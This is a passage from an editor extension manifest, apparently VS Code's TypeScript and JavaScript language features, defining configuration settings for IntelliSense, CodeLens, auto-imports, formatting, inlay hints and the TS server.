.org/schema.json"}],"configuration":[{"type":"object","order":20,"properties":{"typescript.tsdk":{"type":"string","markdownDescription":"Specifies the folder path to the tsserver and `lib*.d.ts` files under a TypeScript install to use for IntelliSense, for example: `./node_modules/typescript/lib`.\n\n- When specified as a user setting, the TypeScript version from `typescript.tsdk` automatically replaces the built-in TypeScript version.\n- When specified as a workspace setting, `typescript.tsdk` allows you to switch to use that workspace version of TypeScript for IntelliSense with the `TypeScript: Select TypeScript version` command.\n\nSee the [TypeScript documentation](https://code.visualstudio.com/docs/typescript/typescript-compiling#_using-newer-typescript-versions) for more detail about managing TypeScript versions.","scope":"window"},"typescript.disableAutomaticTypeAcquisition":{"type":"boolean","default":false,"markdownDescription":"Disables [automatic type acquisition](https://code.visualstudio.com/docs/nodejs/working-with-javascript#_typings-and-automatic-type-acquisition). Automatic type acquisition fetches `@types` packages from npm to improve IntelliSense for external libraries.","scope":"window","tags":["usesOnlineServices"]},"typescript.enablePromptUseWorkspaceTsdk":{"type":"boolean","default":false,"description":"Enables prompting of users to use the TypeScript version configured in the workspace for Intellisense.","scope":"window"},"javascript.referencesCodeLens.enabled":{"type":"boolean","default":false,"description":"Enable/disable references CodeLens in JavaScript files.","scope":"window"},"javascript.referencesCodeLens.showOnAllFunctions":{"type":"boolean","default":false,"description":"Enable/disable references CodeLens on all functions in JavaScript files.","scope":"window"},"typescript.referencesCodeLens.enabled":{"type":"boolean","default":false,"description":"Enable/disable references CodeLens in TypeScript files.","scope":"window"},"typescript.referencesCodeLens.showOnAllFunctions":{"type":"boolean","default":false,"description":"Enable/disable references CodeLens on all functions in TypeScript files.","scope":"window"},"typescript.implementationsCodeLens.enabled":{"type":"boolean","default":false,"description":"Enable/disable implementations CodeLens. This CodeLens shows the implementers of an interface.","scope":"window"},"typescript.experimental.useTsgo":{"type":"boolean","default":false,"markdownDescription":"Disables TypeScript and JavaScript language features to allow usage of the TypeScript Go experimental extension. Requires TypeScript Go to be installed and configured. Requires reloading extensions after changing this setting.","scope":"window","tags":["experimental"]},"typescript.implementationsCodeLens.showOnInterfaceMethods":{"type":"boolean","default":false,"description":"Enable/disable implementations CodeLens on interface methods.","scope":"window"},"typescript.implementationsCodeLens.showOnAllClassMethods":{"type":"boolean","default":false,"description":"Enable/disable showing implementations CodeLens above all class methods instead of only on abstract methods.","scope":"window"},"typescript.reportStyleChecksAsWarnings":{"type":"boolean","default":true,"description":"Report style checks as warnings.","scope":"window"},"typescript.validate.enable":{"type":"boolean","default":true,"description":"Enable/disable TypeScript validation.","scope":"window"},"javascript.validate.enable":{"type":"boolean","default":true,"description":"Enable/disable JavaScript validation.","scope":"window"},"js/ts.implicitProjectConfig.module":{"type":"string","markdownDescription":"Sets the module system for the program. See more: https://www.typescriptlang.org/tsconfig#module.","default":"ESNext","enum":["CommonJS","AMD","System","UMD","ES6","ES2015","ES2020","ESNext","None","ES2022","Node12","NodeNext"],"scope":"window"},"js/ts.implicitProjectConfig.target":{"type":"string","default":"ES2024","markdownDescription":"Set target JavaScript language version for emitted JavaScript and include library declarations. See more: https://www.typescriptlang.org/tsconfig#target.","enum":["ES3","ES5","ES6","ES2015","ES2016","ES2017","ES2018","ES2019","ES2020","ES2021","ES2022","ES2023","ES2024","ESNext"],"scope":"window"},"js/ts.implicitProjectConfig.checkJs":{"type":"boolean","default":false,"markdownDescription":"Enable/disable semantic checking of JavaScript files. Existing `jsconfig.json` or `tsconfig.json` files override this setting.","scope":"window"},"js/ts.implicitProjectConfig.experimentalDecorators":{"type":"boolean","default":false,"markdownDescription":"Enable/disable `experimentalDecorators` in JavaScript files that are not part of a project. Existing `jsconfig.json` or `tsconfig.json` files override this setting.","scope":"window"},"js/ts.implicitProjectConfig.strictNullChecks":{"type":"boolean","default":true,"markdownDescription":"Enable/disable [strict null checks](https://www.typescriptlang.org/tsconfig#strictNullChecks) in JavaScript and TypeScript files that are not part of a project. Existing `jsconfig.json` or `tsconfig.json` files override this setting.","scope":"window"},"js/ts.implicitProjectConfig.strictFunctionTypes":{"type":"boolean","default":true,"markdownDescription":"Enable/disable [strict function types](https://www.typescriptlang.org/tsconfig#strictFunctionTypes) in JavaScript and TypeScript files that are not part of a project. Existing `jsconfig.json` or `tsconfig.json` files override this setting.","scope":"window"},"js/ts.implicitProjectConfig.strict":{"type":"boolean","default":true,"markdownDescription":"Enable/disable [strict mode](https://www.typescriptlang.org/tsconfig#strict) in JavaScript and TypeScript files that are not part of a project. Existing `jsconfig.json` or `tsconfig.json` files override this setting.","scope":"window"},"typescript.tsc.autoDetect":{"type":"string","default":"on","enum":["on","off","build","watch"],"markdownEnumDescriptions":["Create both build and watch tasks.","Disable this feature.","Only create single run compile tasks.","Only create compile and watch tasks."],"description":"Controls auto detection of tsc tasks.","scope":"window"},"typescript.locale":{"type":"string","default":"auto","enum":["auto","de","es","en","fr","it","ja","ko","ru","zh-CN","zh-TW"],"enumDescriptions":["Use VS Code's configured display language.","Deutsch","español","English","français","italiano","日本語","한국어","русский","中文(简体)","中文(繁體)"],"markdownDescription":"Sets the locale used to report JavaScript and TypeScript errors. Defaults to use VS Code's locale.","scope":"window"},"javascript.suggestionActions.enabled":{"type":"boolean","default":true,"description":"Enable/disable suggestion diagnostics for JavaScript files in the editor.","scope":"resource"},"typescript.suggestionActions.enabled":{"type":"boolean","default":true,"description":"Enable/disable suggestion diagnostics for TypeScript files in the editor.","scope":"resource"},"typescript.updateImportsOnFileMove.enabled":{"type":"string","enum":["prompt","always","never"],"markdownEnumDescriptions":["Prompt on each rename.","Always update paths automatically.","Never rename paths and don't prompt."],"default":"prompt","description":"Enable/disable automatic updating of import paths when you rename or move a file in VS Code.","scope":"resource"},"javascript.updateImportsOnFileMove.enabled":{"type":"string","enum":["prompt","always","never"],"markdownEnumDescriptions":["Prompt on each rename.","Always update paths automatically.","Never rename paths and don't prompt."],"default":"prompt","description":"Enable/disable automatic updating of import paths when you rename or move a file in VS Code.","scope":"resource"},"typescript.autoClosingTags":{"type":"boolean","default":true,"description":"Enable/disable automatic closing of JSX tags.","scope":"language-overridable"},"javascript.autoClosingTags":{"type":"boolean","default":true,"description":"Enable/disable automatic closing of JSX tags.","scope":"language-overridable"},"typescript.workspaceSymbols.scope":{"type":"string","enum":["allOpenProjects","currentProject"],"enumDescriptions":["Search all open JavaScript or TypeScript projects for symbols.","Only search for symbols in the current JavaScript or TypeScript project."],"default":"allOpenProjects","markdownDescription":"Controls which files are searched by [Go to Symbol in Workspace](https://code.visualstudio.com/docs/editor/editingevolved#_open-symbol-by-name).","scope":"window"},"typescript.preferGoToSourceDefinition":{"type":"boolean","default":false,"description":"Makes `Go to Definition` avoid type declaration files when possible by triggering `Go to Source Definition` instead. This allows `Go to Source Definition` to be triggered with the mouse gesture.","scope":"window"},"javascript.preferGoToSourceDefinition":{"type":"boolean","default":false,"description":"Makes `Go to Definition` avoid type declaration files when possible by triggering `Go to Source Definition` instead. This allows `Go to Source Definition` to be triggered with the mouse gesture.","scope":"window"},"typescript.workspaceSymbols.excludeLibrarySymbols":{"type":"boolean","default":true,"markdownDescription":"Exclude symbols that come from library files in `Go to Symbol in Workspace` results. Requires using TypeScript 5.3+ in the workspace.","scope":"window"},"typescript.tsserver.enableRegionDiagnostics":{"type":"boolean","default":true,"description":"Enables region-based diagnostics in TypeScript. Requires using TypeScript 5.6+ in the workspace.","scope":"window"},"javascript.updateImportsOnPaste.enabled":{"scope":"window","type":"boolean","default":true,"markdownDescription":"Automatically update imports when pasting code. Requires TypeScript 5.6+."},"typescript.updateImportsOnPaste.enabled":{"scope":"window","type":"boolean","default":true,"markdownDescription":"Automatically update imports when pasting code. Requires TypeScript 5.6+."},"js/ts.hover.maximumLength":{"type":"number","default":500,"description":"The maximum number of characters in a hover. If the hover is longer than this, it will be truncated. Requires TypeScript 5.9+.","scope":"resource"}}},{"type":"object","title":"Suggestions","order":21,"properties":{"javascript.suggest.enabled":{"type":"boolean","default":true,"description":"Enable/disable autocomplete suggestions.","scope":"language-overridable"},"typescript.suggest.enabled":{"type":"boolean","default":true,"description":"Enable/disable autocomplete suggestions.","scope":"language-overridable"},"javascript.suggest.autoImports":{"type":"boolean","default":true,"description":"Enable/disable auto import suggestions.","scope":"resource"},"typescript.suggest.autoImports":{"type":"boolean","default":true,"description":"Enable/disable auto import suggestions.","scope":"resource"},"javascript.suggest.names":{"type":"boolean","default":true,"markdownDescription":"Enable/disable including unique names from the file in JavaScript suggestions. Note that name suggestions are always disabled in JavaScript code that is semantically checked using `@ts-check` or `checkJs`.","scope":"resource"},"javascript.suggest.completeFunctionCalls":{"type":"boolean","default":false,"description":"Complete functions with their parameter signature.","scope":"resource"},"typescript.suggest.completeFunctionCalls":{"type":"boolean","default":false,"description":"Complete functions with their parameter signature.","scope":"resource"},"javascript.suggest.paths":{"type":"boolean","default":true,"description":"Enable/disable suggestions for paths in import statements and require calls.","scope":"resource"},"typescript.suggest.paths":{"type":"boolean","default":true,"description":"Enable/disable suggestions for paths in import statements and require calls.","scope":"resource"},"javascript.suggest.completeJSDocs":{"type":"boolean","default":true,"description":"Enable/disable suggestion to complete JSDoc comments.","scope":"language-overridable"},"typescript.suggest.completeJSDocs":{"type":"boolean","default":true,"description":"Enable/disable suggestion to complete JSDoc comments.","scope":"language-overridable"},"javascript.suggest.jsdoc.generateReturns":{"type":"boolean","default":true,"markdownDescription":"Enable/disable generating `@returns` annotations for JSDoc templates.","scope":"language-overridable"},"typescript.suggest.jsdoc.generateReturns":{"type":"boolean","default":true,"markdownDescription":"Enable/disable generating `@returns` annotations for JSDoc templates.","scope":"language-overridable"},"javascript.suggest.includeAutomaticOptionalChainCompletions":{"type":"boolean","default":true,"description":"Enable/disable showing completions on potentially undefined values that insert an optional chain call. Requires strict null checks to be enabled.","scope":"resource"},"typescript.suggest.includeAutomaticOptionalChainCompletions":{"type":"boolean","default":true,"description":"Enable/disable showing completions on potentially undefined values that insert an optional chain call. Requires strict null checks to be enabled.","scope":"resource"},"javascript.suggest.includeCompletionsForImportStatements":{"type":"boolean","default":true,"description":"Enable/disable auto-import-style completions on partially-typed import statements.","scope":"resource"},"typescript.suggest.includeCompletionsForImportStatements":{"type":"boolean","default":true,"description":"Enable/disable auto-import-style completions on partially-typed import statements.","scope":"resource"},"javascript.suggest.classMemberSnippets.enabled":{"type":"boolean","default":true,"description":"Enable/disable snippet completions for class members.","scope":"resource"},"typescript.suggest.classMemberSnippets.enabled":{"type":"boolean","default":true,"description":"Enable/disable snippet completions for class members.","scope":"resource"},"typescript.suggest.objectLiteralMethodSnippets.enabled":{"type":"boolean","default":true,"description":"Enable/disable snippet completions for methods in object literals.","scope":"resource"}}},{"type":"object","title":"Preferences","order":21,"properties":{"javascript.preferences.quoteStyle":{"type":"string","enum":["auto","single","double"],"default":"auto","markdownDescription":"Preferred quote style to use for Quick Fixes.","markdownEnumDescriptions":["Infer quote type from existing code","Always use single quotes: `'`","Always use double quotes: `\"`"],"scope":"language-overridable"},"typescript.preferences.quoteStyle":{"type":"string","enum":["auto","single","double"],"default":"auto","markdownDescription":"Preferred quote style to use for Quick Fixes.","markdownEnumDescriptions":["Infer quote type from existing code","Always use single quotes: `'`","Always use double quotes: `\"`"],"scope":"language-overridable"},"javascript.preferences.importModuleSpecifier":{"type":"string","enum":["shortest","relative","non-relative","project-relative"],"markdownEnumDescriptions":["Prefers a non-relative import only if one is available that has fewer path segments than a relative import.","Prefers a relative path to the imported file location.","Prefers a non-relative import based on the `baseUrl` or `paths` configured in your `jsconfig.json` / `tsconfig.json`.","Prefers a non-relative import only if the relative import path would leave the package or project directory."],"default":"shortest","description":"Preferred path style for auto imports.","scope":"language-overridable"},"typescript.preferences.importModuleSpecifier":{"type":"string","enum":["shortest","relative","non-relative","project-relative"],"markdownEnumDescriptions":["Prefers a non-relative import only if one is available that has fewer path segments than a relative import.","Prefers a relative path to the imported file location.","Prefers a non-relative import based on the `baseUrl` or `paths` configured in your `jsconfig.json` / `tsconfig.json`.","Prefers a non-relative import only if the relative import path would leave the package or project directory."],"default":"shortest","description":"Preferred path style for auto imports.","scope":"language-overridable"},"javascript.preferences.importModuleSpecifierEnding":{"type":"string","enum":["auto","minimal","index","js"],"enumItemLabels":[null,null,null,".js / .ts"],"markdownEnumDescriptions":["Use project settings to select a default.","Shorten `./component/index.js` to `./component`.","Shorten `./component/index.js` to `./component/index`.","Do not shorten path endings; include the `.js` or `.ts` extension."],"default":"auto","description":"Preferred path ending for auto imports.","scope":"language-overridable"},"typescript.preferences.importModuleSpecifierEnding":{"type":"string","enum":["auto","minimal","index","js"],"enumItemLabels":[null,null,null,".js / .ts"],"markdownEnumDescriptions":["Use project settings to select a default.","Shorten `./component/index.js` to `./component`.","Shorten `./component/index.js` to `./component/index`.","Do not shorten path endings; include the `.js` or `.ts` extension."],"default":"auto","description":"Preferred path ending for auto imports.","scope":"language-overridable"},"javascript.preferences.jsxAttributeCompletionStyle":{"type":"string","enum":["auto","braces","none"],"markdownEnumDescriptions":["Insert `={}` or `=\"\"` after attribute names based on the prop type. See `#javascript.preferences.quoteStyle#` to control the type of quotes used for string attributes.","Insert `={}` after attribute names.","Only insert attribute names."],"default":"auto","description":"Preferred style for JSX attribute completions.","scope":"language-overridable"},"typescript.preferences.jsxAttributeCompletionStyle":{"type":"string","enum":["auto","braces","none"],"markdownEnumDescriptions":["Insert `={}` or `=\"\"` after attribute names based on the prop type. See `#typescript.preferences.quoteStyle#` to control the type of quotes used for string attributes.","Insert `={}` after attribute names.","Only insert attribute names."],"default":"auto","description":"Preferred style for JSX attribute completions.","scope":"language-overridable"},"typescript.preferences.includePackageJsonAutoImports":{"type":"string","enum":["auto","on","off"],"enumDescriptions":["Search dependencies based on estimated performance impact.","Always search dependencies.","Never search dependencies."],"default":"auto","markdownDescription":"Enable/disable searching `package.json` dependencies for available auto imports.","scope":"window"},"javascript.preferences.autoImportFileExcludePatterns":{"type":"array","items":{"type":"string"},"markdownDescription":"Specify glob patterns of files to exclude from auto imports. Relative paths are resolved relative to the workspace root. Patterns are evaluated using tsconfig.json [`exclude`](https://www.typescriptlang.org/tsconfig#exclude) semantics.","scope":"resource"},"typescript.preferences.autoImportFileExcludePatterns":{"type":"array","items":{"type":"string"},"markdownDescription":"Specify glob patterns of files to exclude from auto imports. Relative paths are resolved relative to the workspace root. Patterns are evaluated using tsconfig.json [`exclude`](https://www.typescriptlang.org/tsconfig#exclude) semantics.","scope":"resource"},"javascript.preferences.autoImportSpecifierExcludeRegexes":{"type":"array","items":{"type":"string"},"markdownDescription":"Specify regular expressions to exclude auto imports with matching import specifiers. Examples:\n\n- `^node:`\n- `lib/internal` (slashes don't need to be escaped...)\n- `/lib\\/internal/i` (...unless including surrounding slashes for `i` or `u` flags)\n- `^lodash$` (only allow subpath imports from lodash)","scope":"resource"},"typescript.preferences.autoImportSpecifierExcludeRegexes":{"type":"array","items":{"type":"string"},"markdownDescription":"Specify regular expressions to exclude auto imports with matching import specifiers. Examples:\n\n- `^node:`\n- `lib/internal` (slashes don't need to be escaped...)\n- `/lib\\/internal/i` (...unless including surrounding slashes for `i` or `u` flags)\n- `^lodash$` (only allow subpath imports from lodash)","scope":"resource"},"typescript.preferences.preferTypeOnlyAutoImports":{"type":"boolean","default":false,"markdownDescription":"Include the `type` keyword in auto-imports whenever possible. Requires using TypeScript 5.3+ in the workspace.","scope":"resource"},"javascript.preferences.useAliasesForRenames":{"type":"boolean","default":true,"description":"Enable/disable introducing aliases for object shorthand properties during renames.","scope":"language-overridable"},"typescript.preferences.useAliasesForRenames":{"type":"boolean","default":true,"description":"Enable/disable introducing aliases for object shorthand properties during renames.","scope":"language-overridable"},"javascript.preferences.renameMatchingJsxTags":{"type":"boolean","default":true,"description":"When on a JSX tag, try to rename the matching tag instead of renaming the symbol. Requires using TypeScript 5.1+ in the workspace.","scope":"language-overridable"},"typescript.preferences.renameMatchingJsxTags":{"type":"boolean","default":true,"description":"When on a JSX tag, try to rename the matching tag instead of renaming the symbol. Requires using TypeScript 5.1+ in the workspace.","scope":"language-overridable"},"javascript.preferences.organizeImports":{"type":"object","markdownDescription":"Advanced preferences that control how imports are ordered.","properties":{"caseSensitivity":{"type":"string","markdownDescription":"Specifies how imports should be sorted with regards to case-sensitivity. If `auto` or unspecified, we will detect the case-sensitivity per file","enum":["auto","caseInsensitive","caseSensitive"],"markdownEnumDescriptions":["Detect case-sensitivity for import sorting.","%typescript.preferences.organizeImports.caseSensitivity.insensitive","Sort imports case-sensitively."],"default":"auto"},"typeOrder":{"type":"string","markdownDescription":"Specify how type-only named imports should be sorted.","enum":["auto","last","inline","first"],"default":"auto","markdownEnumDescriptions":["Detect where type-only named imports should be sorted.","Type only named imports are sorted to the end of the import list. E.g. `import { B, Z, type A, type Y } from 'module';`","Named imports are sorted by name only. E.g. `import { type A, B, type Y, Z } from 'module';`","Type only named imports are sorted to the beginning of the import list. E.g. `import { type A, type Y, B, Z } from 'module';`"]},"unicodeCollation":{"type":"string","markdownDescription":"Specify whether to sort imports using Unicode or Ordinal collation.","enum":["ordinal","unicode"],"markdownEnumDescriptions":["Sort imports using the numeric value of each code point.","Sort imports using the Unicode code collation."],"default":"ordinal"},"locale":{"type":"string","markdownDescription":"Requires `organizeImports.unicodeCollation: 'unicode'`. Overrides the locale used for collation. Specify `auto` to use the UI locale."},"numericCollation":{"type":"boolean","markdownDescription":"Requires `organizeImports.unicodeCollation: 'unicode'`. Sort numeric strings by integer value."},"accentCollation":{"type":"boolean","markdownDescription":"Requires `organizeImports.unicodeCollation: 'unicode'`. Compare characters with diacritical marks as unequal to base character."},"caseFirst":{"type":"string","markdownDescription":"Requires `organizeImports.unicodeCollation: 'unicode'`, and `organizeImports.caseSensitivity` is not `caseInsensitive`. Indicates whether upper-case will sort before lower-case.","enum":["default","upper","lower"],"markdownEnumDescriptions":["Default order given by `locale`.","Upper-case comes before lower-case. E.g. ` A, a, B, b`.","Lower-case comes before upper-case. E.g.` a, A, z, Z`."],"default":"default"}}},"typescript.preferences.organizeImports":{"type":"object","markdownDescription":"Advanced preferences that control how imports are ordered.","properties":{"caseSensitivity":{"type":"string","markdownDescription":"Specifies how imports should be sorted with regards to case-sensitivity. If `auto` or unspecified, we will detect the case-sensitivity per file","enum":["auto","caseInsensitive","caseSensitive"],"markdownEnumDescriptions":["Detect case-sensitivity for import sorting.","%typescript.preferences.organizeImports.caseSensitivity.insensitive","Sort imports case-sensitively."],"default":"auto"},"typeOrder":{"type":"string","markdownDescription":"Specify how type-only named imports should be sorted.","enum":["auto","last","inline","first"],"default":"auto","markdownEnumDescriptions":["Detect where type-only named imports should be sorted.","Type only named imports are sorted to the end of the import list. E.g. `import { B, Z, type A, type Y } from 'module';`","Named imports are sorted by name only. E.g. `import { type A, B, type Y, Z } from 'module';`","Type only named imports are sorted to the beginning of the import list. E.g. `import { type A, type Y, B, Z } from 'module';`"]},"unicodeCollation":{"type":"string","markdownDescription":"Specify whether to sort imports using Unicode or Ordinal collation.","enum":["ordinal","unicode"],"markdownEnumDescriptions":["Sort imports using the numeric value of each code point.","Sort imports using the Unicode code collation."],"default":"ordinal"},"locale":{"type":"string","markdownDescription":"Requires `organizeImports.unicodeCollation: 'unicode'`. Overrides the locale used for collation. Specify `auto` to use the UI locale."},"numericCollation":{"type":"boolean","markdownDescription":"Requires `organizeImports.unicodeCollation: 'unicode'`. Sort numeric strings by integer value."},"accentCollation":{"type":"boolean","markdownDescription":"Requires `organizeImports.unicodeCollation: 'unicode'`. Compare characters with diacritical marks as unequal to base character."},"caseFirst":{"type":"string","markdownDescription":"Requires `organizeImports.unicodeCollation: 'unicode'`, and `organizeImports.caseSensitivity` is not `caseInsensitive`. Indicates whether upper-case will sort before lower-case.","enum":["default","upper","lower"],"markdownEnumDescriptions":["Default order given by `locale`.","Upper-case comes before lower-case. E.g. ` A, a, B, b`.","Lower-case comes before upper-case. E.g.` a, A, z, Z`."],"default":"default"}}}}},{"type":"object","title":"Formatting","order":23,"properties":{"javascript.format.enable":{"type":"boolean","default":true,"description":"Enable/disable default JavaScript formatter.","scope":"window"},"typescript.format.enable":{"type":"boolean","default":true,"description":"Enable/disable default TypeScript formatter.","scope":"window"},"javascript.format.insertSpaceAfterCommaDelimiter":{"type":"boolean","default":true,"description":"Defines space handling after a comma delimiter.","scope":"resource"},"typescript.format.insertSpaceAfterCommaDelimiter":{"type":"boolean","default":true,"description":"Defines space handling after a comma delimiter.","scope":"resource"},"javascript.format.insertSpaceAfterConstructor":{"type":"boolean","default":false,"description":"Defines space handling after the constructor keyword.","scope":"resource"},"typescript.format.insertSpaceAfterConstructor":{"type":"boolean","default":false,"description":"Defines space handling after the constructor keyword.","scope":"resource"},"javascript.format.insertSpaceAfterSemicolonInForStatements":{"type":"boolean","default":true,"description":"Defines space handling after a semicolon in a for statement.","scope":"resource"},"typescript.format.insertSpaceAfterSemicolonInForStatements":{"type":"boolean","default":true,"description":"Defines space handling after a semicolon in a for statement.","scope":"resource"},"javascript.format.insertSpaceBeforeAndAfterBinaryOperators":{"type":"boolean","default":true,"description":"Defines space handling after a binary operator.","scope":"resource"},"typescript.format.insertSpaceBeforeAndAfterBinaryOperators":{"type":"boolean","default":true,"description":"Defines space handling after a binary operator.","scope":"resource"},"javascript.format.insertSpaceAfterKeywordsInControlFlowStatements":{"type":"boolean","default":true,"description":"Defines space handling after keywords in a control flow statement.","scope":"resource"},"typescript.format.insertSpaceAfterKeywordsInControlFlowStatements":{"type":"boolean","default":true,"description":"Defines space handling after keywords in a control flow statement.","scope":"resource"},"javascript.format.insertSpaceAfterFunctionKeywordForAnonymousFunctions":{"type":"boolean","default":true,"description":"Defines space handling after function keyword for anonymous functions.","scope":"resource"},"typescript.format.insertSpaceAfterFunctionKeywordForAnonymousFunctions":{"type":"boolean","default":true,"description":"Defines space handling after function keyword for anonymous functions.","scope":"resource"},"javascript.format.insertSpaceBeforeFunctionParenthesis":{"type":"boolean","default":false,"description":"Defines space handling before function argument parentheses.","scope":"resource"},"typescript.format.insertSpaceBeforeFunctionParenthesis":{"type":"boolean","default":false,"description":"Defines space handling before function argument parentheses.","scope":"resource"},"javascript.format.insertSpaceAfterOpeningAndBeforeClosingNonemptyParenthesis":{"type":"boolean","default":false,"description":"Defines space handling after opening and before closing non-empty parenthesis.","scope":"resource"},"typescript.format.insertSpaceAfterOpeningAndBeforeClosingNonemptyParenthesis":{"type":"boolean","default":false,"description":"Defines space handling after opening and before closing non-empty parenthesis.","scope":"resource"},"javascript.format.insertSpaceAfterOpeningAndBeforeClosingNonemptyBrackets":{"type":"boolean","default":false,"description":"Defines space handling after opening and before closing non-empty brackets.","scope":"resource"},"typescript.format.insertSpaceAfterOpeningAndBeforeClosingNonemptyBrackets":{"type":"boolean","default":false,"description":"Defines space handling after opening and before closing non-empty brackets.","scope":"resource"},"javascript.format.insertSpaceAfterOpeningAndBeforeClosingNonemptyBraces":{"type":"boolean","default":true,"description":"Defines space handling after opening and before closing non-empty braces.","scope":"resource"},"typescript.format.insertSpaceAfterOpeningAndBeforeClosingNonemptyBraces":{"type":"boolean","default":true,"description":"Defines space handling after opening and before closing non-empty braces.","scope":"resource"},"javascript.format.insertSpaceAfterOpeningAndBeforeClosingEmptyBraces":{"type":"boolean","default":true,"description":"Defines space handling after opening and before closing empty braces.","scope":"resource"},"typescript.format.insertSpaceAfterOpeningAndBeforeClosingEmptyBraces":{"type":"boolean","default":true,"description":"Defines space handling after opening and before closing empty braces.","scope":"resource"},"javascript.format.insertSpaceAfterOpeningAndBeforeClosingTemplateStringBraces":{"type":"boolean","default":false,"description":"Defines space handling after opening and before closing template string braces.","scope":"resource"},"typescript.format.insertSpaceAfterOpeningAndBeforeClosingTemplateStringBraces":{"type":"boolean","default":false,"description":"Defines space handling after opening and before closing template string braces.","scope":"resource"},"javascript.format.insertSpaceAfterOpeningAndBeforeClosingJsxExpressionBraces":{"type":"boolean","default":false,"description":"Defines space handling after opening and before closing JSX expression braces.","scope":"resource"},"typescript.format.insertSpaceAfterOpeningAndBeforeClosingJsxExpressionBraces":{"type":"boolean","default":false,"description":"Defines space handling after opening and before closing JSX expression braces.","scope":"resource"},"typescript.format.insertSpaceAfterTypeAssertion":{"type":"boolean","default":false,"description":"Defines space handling after type assertions in TypeScript.","scope":"resource"},"javascript.format.placeOpenBraceOnNewLineForFunctions":{"type":"boolean","default":false,"description":"Defines whether an open brace is put onto a new line for functions or not.","scope":"resource"},"typescript.format.placeOpenBraceOnNewLineForFunctions":{"type":"boolean","default":false,"description":"Defines whether an open brace is put onto a new line for functions or not.","scope":"resource"},"javascript.format.placeOpenBraceOnNewLineForControlBlocks":{"type":"boolean","default":false,"description":"Defines whether an open brace is put onto a new line for control blocks or not.","scope":"resource"},"typescript.format.placeOpenBraceOnNewLineForControlBlocks":{"type":"boolean","default":false,"description":"Defines whether an open brace is put onto a new line for control blocks or not.","scope":"resource"},"javascript.format.semicolons":{"type":"string","default":"ignore","description":"Defines handling of optional semicolons.","scope":"resource","enum":["ignore","insert","remove"],"enumDescriptions":["Don't insert or remove any semicolons.","Insert semicolons at statement ends.","Remove unnecessary semicolons."]},"typescript.format.semicolons":{"type":"string","default":"ignore","description":"Defines handling of optional semicolons.","scope":"resource","enum":["ignore","insert","remove"],"enumDescriptions":["Don't insert or remove any semicolons.","Insert semicolons at statement ends.","Remove unnecessary semicolons."]},"javascript.format.indentSwitchCase":{"type":"boolean","default":true,"description":"Indent case clauses in switch statements. Requires using TypeScript 5.1+ in the workspace.","scope":"resource"},"typescript.format.indentSwitchCase":{"type":"boolean","default":true,"description":"Indent case clauses in switch statements. Requires using TypeScript 5.1+ in the workspace.","scope":"resource"}}},{"type":"object","title":"Inlay Hints","order":24,"properties":{"typescript.inlayHints.parameterNames.enabled":{"type":"string","enum":["none","literals","all"],"enumDescriptions":["Disable parameter name hints.","Enable parameter name hints only for literal arguments.","Enable parameter name hints for literal and non-literal arguments."],"default":"none","markdownDescription":"Enable/disable inlay hints for parameter names:\n```typescript\n\nparseInt(/* str: */ '123', /* radix: */ 8)\n \n```","scope":"resource"},"typescript.inlayHints.parameterNames.suppressWhenArgumentMatchesName":{"type":"boolean","default":true,"markdownDescription":"Suppress parameter name hints on arguments whose text is identical to the parameter name.","scope":"resource"},"typescript.inlayHints.parameterTypes.enabled":{"type":"boolean","default":false,"markdownDescription":"Enable/disable inlay hints for implicit parameter types:\n```typescript\n\nel.addEventListener('click', e /* :MouseEvent */ => ...)\n \n```","scope":"resource"},"typescript.inlayHints.variableTypes.enabled":{"type":"boolean","default":false,"markdownDescription":"Enable/disable inlay hints for implicit variable types:\n```typescript\n\nconst foo /* :number */ = Date.now();\n \n```","scope":"resource"},"typescript.inlayHints.variableTypes.suppressWhenTypeMatchesName":{"type":"boolean","default":true,"markdownDescription":"Suppress type hints on variables whose name is identical to the type name.","scope":"resource"},"typescript.inlayHints.propertyDeclarationTypes.enabled":{"type":"boolean","default":false,"markdownDescription":"Enable/disable inlay hints for implicit types on property declarations:\n```typescript\n\nclass Foo {\n\tprop /* :number */ = Date.now();\n}\n \n```","scope":"resource"},"typescript.inlayHints.functionLikeReturnTypes.enabled":{"type":"boolean","default":false,"markdownDescription":"Enable/disable inlay hints for implicit return types on function signatures:\n```typescript\n\nfunction foo() /* :number */ {\n\treturn Date.now();\n} \n \n```","scope":"resource"},"typescript.inlayHints.enumMemberValues.enabled":{"type":"boolean","default":false,"markdownDescription":"Enable/disable inlay hints for member values in enum declarations:\n```typescript\n\nenum MyValue {\n\tA /* = 0 */;\n\tB /* = 1 */;\n}\n \n```","scope":"resource"},"javascript.inlayHints.parameterNames.enabled":{"type":"string","enum":["none","literals","all"],"enumDescriptions":["Disable parameter name hints.","Enable parameter name hints only for literal arguments.","Enable parameter name hints for literal and non-literal arguments."],"default":"none","markdownDescription":"Enable/disable inlay hints for parameter names:\n```typescript\n\nparseInt(/* str: */ '123', /* radix: */ 8)\n \n```","scope":"resource"},"javascript.inlayHints.parameterNames.suppressWhenArgumentMatchesName":{"type":"boolean","default":true,"markdownDescription":"Suppress parameter name hints on arguments whose text is identical to the parameter name.","scope":"resource"},"javascript.inlayHints.parameterTypes.enabled":{"type":"boolean","default":false,"markdownDescription":"Enable/disable inlay hints for implicit parameter types:\n```typescript\n\nel.addEventListener('click', e /* :MouseEvent */ => ...)\n \n```","scope":"resource"},"javascript.inlayHints.variableTypes.enabled":{"type":"boolean","default":false,"markdownDescription":"Enable/disable inlay hints for implicit variable types:\n```typescript\n\nconst foo /* :number */ = Date.now();\n \n```","scope":"resource"},"javascript.inlayHints.variableTypes.suppressWhenTypeMatchesName":{"type":"boolean","default":true,"markdownDescription":"Suppress type hints on variables whose name is identical to the type name.","scope":"resource"},"javascript.inlayHints.propertyDeclarationTypes.enabled":{"type":"boolean","default":false,"markdownDescription":"Enable/disable inlay hints for implicit types on property declarations:\n```typescript\n\nclass Foo {\n\tprop /* :number */ = Date.now();\n}\n \n```","scope":"resource"},"javascript.inlayHints.functionLikeReturnTypes.enabled":{"type":"boolean","default":false,"markdownDescription":"Enable/disable inlay hints for implicit return types on function signatures:\n```typescript\n\nfunction foo() /* :number */ {\n\treturn Date.now();\n} \n \n```","scope":"resource"}}},{"type":"object","title":"TS Server","order":25,"properties":{"typescript.tsserver.nodePath":{"type":"string","description":"Run TS Server on a custom Node installation. This can be a path to a Node executable, or 'node' if you want VS Code to detect a Node installation.","scope":"window"},"typescript.npm":{"type":"string","markdownDescription":"Specifies the path to the npm executable used for [Automatic Type Acquisition](https://code.visualstudio.com/docs/nodejs/working-with-javascript#_typings-and-automatic-type-acquisition).","scope":"machine"},"typescript.check.npmIsInstalled":{"type":"boolean","default":true,"markdownDescription":"Check if npm 